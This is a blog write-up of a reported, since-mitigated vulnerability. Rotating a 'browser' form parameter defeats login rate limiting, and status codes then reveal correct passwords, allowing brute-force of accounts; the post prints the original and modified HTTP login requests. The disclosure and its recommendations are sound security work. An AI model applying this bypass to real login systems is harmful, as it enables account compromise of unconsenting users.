Monday, May 19, 2014

A Way to Bypass Rate Limiting

Another Way to Bypass Rate Limiting

I want to share one of my finding on site.com(site name will be disclosed later) which I have reported to them on 5th May 2014.

I have found that site.com following Url https://account.site.com/sso/1.0.0/login?site=contests&locale=en-us&return=https://site.com/sso/login&rd=lNFC-iNCgY5Xnzsq6UvI_ykRl__KUS2MzzhB_Alu5LA= was vulnerable to Bruteforce attacks even when the Rate-Limting is implement for all the site.com users account and the server is disabling the requests.

So first I tried to do the Status Code Value or Response Code Value, Length Code Analysis but it was same as 200 for all Right & Wrong Password attempts as we hit the 60 Wrong Password Attempts also the error message was generic for all Right & Wrong Password Attempts.

Then I tried to do the User-Agent based bruteforce attack by changing the user-agent to known and anonymous user-agent in header of the each request but it also failed and then after futher more Deep Analysis I found that there was a parameter named browser was sent using post method in each request with Wrong or Right Password and this parameter was containing a value which was the currently used browsers name i.e. internet+explorer. So, that means the server was checking the User-Agent using header and also using the browser name parameter and its value internet+explorer.

So to find weakness in the Rate Limiting countermeasure 1st sent more then 60 Wrong Password requests using  the browser parameter with the value internet+explorer as the 60 Wrong Password requests sent the the Rate Limiting got enabled and it started blocking the wrong or right password request and was sending the response code and length code as 200 for all Right & Wrong Password attempts also the error message was generic for all Right & Wrong Password Attempts so again it failed. 

After that I started sending each request with the browser named parameter value which I changed to any known and also any unknown value as browser name value. So, then I observed that after more then 60 Wrong Password Attempts and also even after more then 10000 Wrong Passwords Attempts the Rate Limiting didn't got enabled nor the Status Code Value or Response Code Value, Length Code values changed to 200. Instead for Right Password it was 302 and for Wrong Pass it was 200.

So, in this way I was able to Bypass the site.com Rate Limting by changning the browser parameter value in each request and by analyzing the Status Code Value or Response Code Value, Length Code values differences.

Original Request:

POST /sso/1.0.0/login?site=contests&locale=en-us&return=https://site.com/sso/login&target=http://site.com/&rd=lNFC-iNCgY5Xnzsq6UvI_ykRl__KUS2MzzhB_Alu5LA= HTTP/1.1
Accept: text/html, application/xhtml+xml, /
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: __iswl_accountsitecom=0; sp_id..cf43=f48faee182ec56ef.1399262073.1.1399262078.1399262073; sp_ses..cf43=*; _msuuid_75mlvfed70=937C0A8D-BDBA-40E7-9632-AA2BB97F051F; __ssid=69a7009e-a365-4481-87e3-60620271c47d; CookiedSession=P90fAidSF8hdgPCKZkgn2KdK7sAj0imf4TLPMLiyKU=.K-FAwEBC3Nlc3Npb25EYXRhAf-GAAECAQJJZAEMAAEFU3RvcmUB_4gAAAAh_4cEAQERbWFwW3N0cmluZ11zdHJpbmcB_4gAAQwBDAAAKv-GARZhWW1qc2tlbHo5SVM3UWozamtGeE9IAQEGbG9jYWxlBWVuLXVzAA==
Host: account.site.com
Content-Length: 202
Connection: Keep-Alive
Cache-Control: no-cache
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)

username=victimemailid@gmail.com&password=shssjssjs&browser=Internet+Explorer&browserversion=10.0&screenresolution=1422x889&operatingsystem=Windows&timezoneoffset=420&csrf_token=aYmjskelz9IS7Qj3jkFxOH


Modified Request:

POST /sso/1.0.0/login?site=contests&locale=en-us&return=https://site.com/sso/login&target=http://site.com/&rd=lNFC-iNCgY5Xnzsq6UvI_ykRl__KUS2MzzhB_Alu5LA= HTTP/1.1
Accept: text/html, application/xhtml+xml, /
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: __iswl_accountsitecom=0; sp_id..cf43=f48faee182ec56ef.1399262073.1.1399262078.1399262073; sp_ses..cf43=*; _msuuid_75mlvfed70=937C0A8D-BDBA-40E7-9632-AA2BB97F051F; __ssid=69a7009e-a365-4481-87e3-60620271c47d; CookiedSession=P90fAidSF8hdgPCKZkgn2KdK7sAj0imf4TLPMLiyKU=.K-FAwEBC3Nlc3Npb25EYXRhAf-GAAECAQJJZAEMAAEFU3RvcmUB_4gAAAAh_4cEAQERbWFwW3N0cmluZ11zdHJpbmcB_4gAAQwBDAAAKv-GARZhWW1qc2tlbHo5SVM3UWozamtGeE9IAQEGbG9jYWxlBWVuLXVzAA==
Host: account.site.com
Content-Length: 202
Connection: Keep-Alive
Cache-Control: no-cache
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)

username=
victimemailid@gmail.com&password=shssjssjs&browser=test+test&browserversion=10.0&screenresolution=1422x889&operatingsystem=Windows&timezoneoffset=420&csrf_token=aYmjskelz9IS7Qj3jkFxOH


In this way the attacker was able to Bypass the Rate Limiting of site.com.


Impact:

The attacker can successfully bruteforce the passwords on any users acccount even when the rate limiting is enabled and this can lead to account compromise.



Recommendation:
The Length Code Value for Right & Wrong Passwords shall always be Same for Any Users Account.

Instead of user-agent based validation for enabling the rate limiting user id shall be checked for numbers of wrong password attempts.


The account shall only be unlocked using a email which contains a Un-Lock account link.

The vulnerability was mitigated by site.com Security Team in 2 weeks.

So in this way, one can Bypass Rate Limting and can also compromise the victims account also this technique can be used to find same type of vulnerabilities on different websites.

Suggestions and Feedbacks are welcome.

3 comments:

  1. hello Negi sir

    how rate limiting is done in login page. ???

    ReplyDelete
  2. This is great sir. If you don't mind me asking, how did you get interested in web security research?

    ReplyDelete
  3. Cool
    http://www.websecresearch.com/2009/11/basic-to-in-depth-home-computer_1115.html

    ReplyDelete

You Have Successfully Posted the Message.